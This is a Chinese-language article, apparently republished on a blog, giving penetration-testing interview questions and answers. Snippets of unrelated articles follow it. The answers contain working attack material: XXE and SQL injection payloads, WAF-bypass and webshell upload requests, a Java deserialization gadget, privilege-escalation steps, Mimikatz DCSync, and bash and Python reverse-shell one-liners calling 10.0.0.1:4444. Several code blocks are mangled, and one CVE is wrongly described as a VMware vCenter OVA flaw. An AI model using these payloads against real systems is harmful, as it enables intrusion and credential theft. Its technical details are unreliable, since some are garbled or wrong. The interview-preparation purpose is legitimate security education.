2025年常見滲透測試面試題(題目+回答)

網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

?常見面試題

一、滲透測試經歷與技術復盤

二、高頻漏洞類型與攻防體系

三、滲透工具鏈與技術特性

四、WAF繞過技術矩陣

五、系統提權技術路徑

六、開源組件高危漏洞庫

七、CVE深度分析案例

八、服務器入侵應急響應流程

九、SQL注入全方位防御

十、中間件解析漏洞利用

十一、系統加固技術方案

十二、CDN穿透技術矩陣

十三、滲透測試方法論

十四、反彈Shell技術體系

十五、內網滲透實戰框架

?常見面試題

介紹一下自認為有趣的挖洞經歷(或CTF經歷)
你平時用的比較多的漏洞是哪些?相關漏洞的原理?以及對應漏洞的修復方案?
你平時使用哪些工具?以及對應工具的特點?
如果遇到waf的情況下如何進行SQL注入/上傳Webshell怎么做?
談談Windows系統與Linux系統提權的思路?
列舉出您所知道的所有開源組件高危漏洞
描述一個你深入研究過的 CVE 或 POC
php/java反序列化漏洞的原理?解決方案?
如果一臺服務器被入侵后,你會如何做應急響應?
介紹 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了數據庫數據,利用方式還有哪些?
常見的中間件解析漏洞利用方式
Windows、Linux、數據庫的加固降權思路
如何繞過CDN獲取目標網站真實IP,談談你的思路
如果給你一個網站,你的滲透測試思路是什么??
你實際的滲透測試經歷等等
反彈 shell 的常用命令?一般常反彈哪一種 shell?為什么?
SSRF漏洞的成因 防御 繞過?
有哪些反向代理的工具,有沒有實際的內網滲透經歷?

一、滲透測試經歷與技術復盤

  1. XXE漏洞挖掘案例 在某金融系統測試中發現XML解析模塊未禁用外部實體引用,通過構造惡意DTD實現:
xml<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <data>&xxe;</data>

利用過程:通過觀察HTTP請求Content-Type為application/xml,測試不同XML結構觸發文件讀取。修復方案:配置XML解析器禁用外部實體(如設置XMLConstants.FEATURE_SECURE_PROCESSING

  1. 邏輯漏洞組合利用 在電商平臺發現"購物車價格篡改+并發請求"組合漏洞:
  • 修改前端價格參數后發送100次并發請求
  • 利用訂單狀態機處理延遲(5秒內未支付可重復提交)
  • 修復方案:后端價格校驗+分布式鎖控制訂單創建
  1. CTF中SSRF繞過案例 目標環境過濾127.0.0.1,使用以下技術鏈:
http://0177.0.0.1 → 八進制IP編碼 
http://localhost. → 域名后綴繞過 
http://{FALSE DOMAIN}?x=http://127.0.0.1 → 二次跳轉 

二、高頻漏洞類型與攻防體系

(以下為節選部分內容,完整版包含10類漏洞分析)

  1. SQL注入 原理:未過濾用戶輸入導致查詢結構破壞
sqlSELECT * FROM users WHERE id='1' UNION SELECT database()-- '

修復方案:

  • 預編譯語句(Java示例):
javaPreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE id=?"); stmt.setString(1, input);
  1. 反序列化漏洞 Java反序列化攻擊鏈構建:
javapublic class Exploit implements Serializable { private void readObject(ObjectInputStream in) { Runtime.getRuntime().exec("calc.exe"); } }

防御方案:

  • 使用SafeObjectInputStream
  • 配置serialFilter白名單

三、滲透工具鏈與技術特性

工具名稱核心功能技術特點
SQLMapSQL注入檢測支持6種注入技術,自動識別WAF
Burp SuiteWeb漏洞掃描可擴展插件架構,支持Intruder模塊爆破
Metasploit漏洞利用框架集成2000+漏洞模塊,支持載荷生成

四、WAF繞過技術矩陣

  1. SQL注入繞過技術:
  • 注釋符變異:/*!50000SELECT*/
  • 字符編碼:CHAR(83,69,76,69,67,84)
  • 等價函數替換:MID() → SUBSTR()
  1. 文件上傳繞過方案:
httpPOST /upload HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="test.pHp" Content-Type: image/jpeg <?php system($_GET['cmd']);?>

五、系統提權技術路徑

Windows提權路線:

  1. 服務路徑漏洞:劫持未引號服務路徑
  2. DLL注入:利用PSExec加載惡意DLL
  3. 令牌竊取:使用Mimikatz獲取SYSTEM令牌

Linux提權技術:

bash# SUID提權案例 find / -perm -4000 2>/dev/null # 內核漏洞利用 gcc dirtycow.c -o exp && ./exp 

六、開源組件高危漏洞庫

(節選部分,完整列表包含15個CVE)

  1. Apache Log4j2 (CVE-2021-44228)
  • 影響版本:2.0-beta9 to 2.14.1
  • 修復方案:升級至2.15.0+并設置log4j2.formatMsgNoLookups=true
  1. Fastjson反序列化 (CNVD-2019-22238)
  • 攻擊載荷:利用JNDI注入點
  • 安全配置:啟用SafeMode

七、CVE深度分析案例

以CVE-2021-34429(VMware vCenter漏洞)為例:

  1. 漏洞成因:OVA文件上傳時未校驗XML簽名
  2. 利用鏈:
pythonwith zipfile.ZipFile('exploit.ova', 'w') as z: z.writestr('service.xml', malicious_xml)
  1. 流量特征:HTTP PUT請求包含/vsphere-client/...路徑

八、服務器入侵應急響應流程

  1. 事件確認階段:
  • 使用Volatility分析內存鏡像
  • 檢查/etc/passwd修改時間戳
bashstat -c %y /etc/passwd 
  1. 溯源分析:
  • 查詢防火墻日志
bashgrep 'ESTABLISHED' /var/log/iptables.log 
  • 提取Webshell特征碼:
php$s = preg_replace('/.*eval\((.*)\).*/', '$1', $fileContents);

九、SQL注入全方位防御

防范技術體系:

  1. 輸入驗證:正則表達式過濾[\s'";#]
  2. 數據庫加固:
sqlREVOKE FILE ON *.* FROM 'webuser'@'%'; ALTER USER 'webuser'@'%' WITH MAX_QUERIES_PER_HOUR 100;

十、中間件解析漏洞利用

IIS 6.0解析漏洞利用:

httpPUT /test.txt HTTP/1.1 Host: target Content-Length: 100 <%execute(request("cmd"))%>

通過重命名為test.txt;.asp 觸發腳本執行

十一、系統加固技術方案

Windows加固清單:

  1. 服務管理:
powershellGet-Service | Where-Object {$_.StartType -eq 'Auto'} Set-Service -Name "Telnet" -StartupType Disabled 

Linux權限控制:

bashchmod 0755 /usr/bin/wget setfacl -m u:www-data:r-x /var/www 

十二、CDN穿透技術矩陣

真實IP發現方法:

  1. 全球DNS歷史記錄查詢
  2. 子域名爆破:*.internal.example.com
  3. SSL證書關聯分析:openssl s_client -connect target:443

十三、滲透測試方法論

五階段模型:

  1. 信息收集:
bashsubfinder -d example.com -o subs.txt nmap -sV --script=http-title -iL subs.txt 
  1. 漏洞利用:
pythonrequests.post(url, data={"id": "1 AND 1=LOAD_FILE('/etc/passwd')"})

十四、反彈Shell技術體系

常用Payload對比:

bash# Bash反彈 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 # Python穩定性更強 python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

十五、內網滲透實戰框架

內網穿透方案:

  1. 使用reGeorg建立隧道:
pythonpython reGeorgSocksProxy.py -p 8080 -u http://target/tunnel.php 
  1. 橫向移動技術:
powershellInvoke-Mimikatz -Command '"lsadump::dcsync /domain:corp /user:Administrator"'

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/77001.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/77001.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/77001.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

大數據與人工智能之大數據架構(Hadoop、Spark、Flink)

一、核心特性與架構設計 1. Hadoop&#xff1a;分布式批處理的基石 核心組件&#xff1a; HDFS&#xff1a;分布式文件系統&#xff0c;支持大規模數據存儲。MapReduce&#xff1a;基于“分而治之”的批處理模型&#xff0c;適合離線分析。 架構特點&#xff1a; 批處理主導&…

從IoT到AIoT:智能邊界的拓展與AI未來趨勢預測

文章目錄 引言&#xff1a;從連接萬物到感知萬物1. AIoT的本質&#xff1a;將智能嵌入萬物2. AIoT的推動力量與挑戰2.1 推動力量2.2 關鍵挑戰 3. 五大AIoT未來趨勢預測趨勢一&#xff1a;邊緣智能將成為主流架構趨勢二&#xff1a;AI模型將向自適應與多任務演進趨勢三&#xff…

從本地新建文件夾到拉取遠程倉庫 dev 分支的完整步驟

《從本地新建文件夾到拉取遠程倉庫 dev 分支的完整步驟》 下面為你詳細介紹從本地新建文件夾開始&#xff0c;將遠程倉庫的 dev 分支拉取到本地的具體步驟&#xff1a; 1. 創建新文件夾 在本地電腦上新建一個文件夾&#xff0c;作為存放項目代碼的目錄。你可以通過圖形界面操…

python/pytorch雜聊

Dataset 是否需要自己定義&#xff1a;如果你使用的數據集不是 PyTorch 提供的標準數據集&#xff08;如 MNIST、CIFAR-10 等&#xff09;&#xff0c;那么你需要繼承 torch.utils.data.Dataset 類并實現兩個方法&#xff1a;__len__() 和 __getitem__()。__len__() 應該返回數…

PHP 安全 E-mail

PHP 安全 E-mail 引言 隨著互聯網的普及和電子商務的發展,電子郵件成為了人們日常生活中不可或缺的通信工具。PHP作為一種廣泛使用的服務器端腳本語言,也經常被用于發送和接收電子郵件。然而,在PHP中處理電子郵件時,安全性問題不容忽視。本文將深入探討PHP安全發送電子郵…

【夜話系列】DelayQueue延遲隊列(下):實戰應用與面試精講

?? 本文是DelayQueue系列的下篇,聚焦實戰應用場景和性能優化。通過多個真實案例,帶你掌握DelayQueue在項目中的最佳實踐和性能調優技巧。 ?? 系列專欄推薦: JAVA集合專欄 【夜話集】JVM知識專欄數據庫sql理論與實戰小游戲開發文章目錄 一、DelayQueue實戰應用1.1 訂單超…

Redis(筆記)

簡介&#xff1a; 常用數據類型: 常用操作命令&#xff1a; Redis的Java客戶端&#xff1a; 操作字符串類型的數據&#xff1a; 操作Hash類型的數據&#xff1a; 操作列表類型的數據&#xff1a; 操作集合類型的數據&#xff1a; 操作有序集合類型數據&#xff1a; 通用命令…

PhotoShop學習05

1.選區基礎知識 選區&#xff0c;就是選定一些區域&#xff0c;我們對圖片的更改只在選區內生效&#xff0c;這樣可以精細調整圖片的部分而不會影響整體。它的快捷鍵是M。 我們用點擊鼠標后滑動就會出現虛線框&#xff0c;虛線框內的就是我們選定的區域。這時我們再滑動就會創…

使用Redission實現分布式鎖

分布式鎖在分布式系統中非常重要&#xff0c;主要用于解決多個進程/服務并發訪問共享資源時的數據一致性問題。在日常開發中常用于&#xff1a; 1. 防止重復操作&#xff08;冪等性控制&#xff09; 場景&#xff1a;用戶重復提交訂單、重復支付、重復點擊等。 示例&#xff1…

VScode 畫時序圖(FPGA)

1、先安裝插件&#xff1a; 2、然后就可以編寫一個.js文件&#xff0c;如下&#xff1a; {signal: [{name: clk, wave: p.......|..},{name: rstn, wave: 01......|..},{name: din_vld, wave: 0.1.0...|..},{name: din, wave: "x.x...|..", data: ["D0", …

嵌入式學習筆記——I2C

IIC協議詳解 一、IIC協議簡介二、IIC總線結構圖三、IIC通信流程詳解1. 空閑狀態 : 雙高空閑2. 起始信號&#xff08;START&#xff09;: 時高數下開始3. 停止信號&#xff08;STOP&#xff09;: 時高數上結束4. 數據傳輸格式 : 時高數穩&#xff0c;時低數變5. 應答信號 四、寫…

Apifox Helper 與 Swagger3 區別

核心定位差異 Apifox Helper 定位&#xff1a;基于 IDEA 的代碼注釋解析工具&#xff0c;與 Apifox 平臺深度集成&#xff0c;實現文檔自動生成接口管理測試協作的一體化流程。 特點&#xff1a; 通過解析 Javadoc、KDoc 等注釋生成文檔&#xff0c;代碼零侵入&#xff08;無…

單片機實現多線程的方法匯總

在單片機上實現“多線程”的方法有幾種&#xff0c;下面按照從簡單到復雜、從輕量到系統性來列出常見的方案&#xff1a; &#x1f9f5; 一、偽多線程&#xff08;最輕量&#xff09; 方法&#xff1a;主循環 狀態機 / 定時器輪詢 主循環中輪流調用各個任務的處理函數&#x…

網絡:華為數通HCIA學習:靜態路由基礎

文章目錄 前言靜態路由基礎靜態路由應用場景 靜態路由配置靜態路由在串行網絡的配置靜態路由在以太網中的配置 負載分擔配置驗證 路由備份&#xff08;浮動靜態路由&#xff09;配置驗證 缺省路由配置驗證 總結 華為HCIA 基礎實驗&#xff0d;靜態路由 & eNSP靜態路由 基礎…

[項目總結] 在線OJ刷題系統項目技術應用(下)

&#x1f338;個人主頁:https://blog.csdn.net/2301_80050796?spm1000.2115.3001.5343 &#x1f3f5;?熱門專欄: &#x1f9ca; Java基本語法(97平均質量分)https://blog.csdn.net/2301_80050796/category_12615970.html?spm1001.2014.3001.5482 &#x1f355; Collection與…

Qt音頻輸出:QAudioOutput詳解與示例

1. 簡介 QAudioOutput是Qt多媒體框架中的一個關鍵類&#xff0c;它提供了將PCM&#xff08;脈沖編碼調制&#xff09;原始音頻數據發送到音頻輸出設備的接口。作為Qt多媒體組件的一部分&#xff0c;QAudioOutput允許開發者在應用程序中實現音頻播放功能&#xff0c;支持多種音…

【計算機網絡】Linux配置SNAT/DNAT策略

什么是NAT&#xff1f; NAT 全稱是 Network Address Translation&#xff08;網絡地址轉換&#xff09;&#xff0c;是一個用來在多個設備共享一個公網 IP上網的技術。 NAT 的核心作用&#xff1a;將一個網絡中的私有 IP 地址&#xff0c;轉換為公網 IP 地址&#xff0c;從而…

Redis淘汰策略詳解!

目錄 一、為什么需要淘汰策略&#xff1f; &#x1f914;二、Redis 的淘汰策略詳解 &#x1f447;三、如何選擇合適的淘汰策略&#xff1f; &#x1f914;???四、如何切換 Redis 的淘汰策略&#xff1f; ??&#x1f527;五、總結 &#x1f389; &#x1f31f;我的其他文章…

存儲基石:深度解讀Linux磁盤管理機制與文件系統實戰

Linux系列 文章目錄 Linux系列前言一、磁盤1.1 初識磁盤1.2 磁盤的物理結構1.3 磁盤的存儲結構1.4 磁盤的邏輯結構 二、文件系統2.1 系統對磁盤的管理2.2 文件在磁盤中的操作 前言 Linux 文件系統是操作系統中用于管理和組織存儲設備&#xff08;如硬盤、SSD、USB 等&#xff…

本節課課堂總結

匿名子類&#xff1a; 說明 和 Java 一樣&#xff0c;可以通過包含帶有定義或重寫的代碼塊的方式創建一個匿名的子類。 單例對象&#xff08;伴生對象&#xff09; Scala語言是完全面向對象的語言&#xff0c;所以并沒有靜態的操作&#xff08;即在Scala中沒有靜態的概念&a…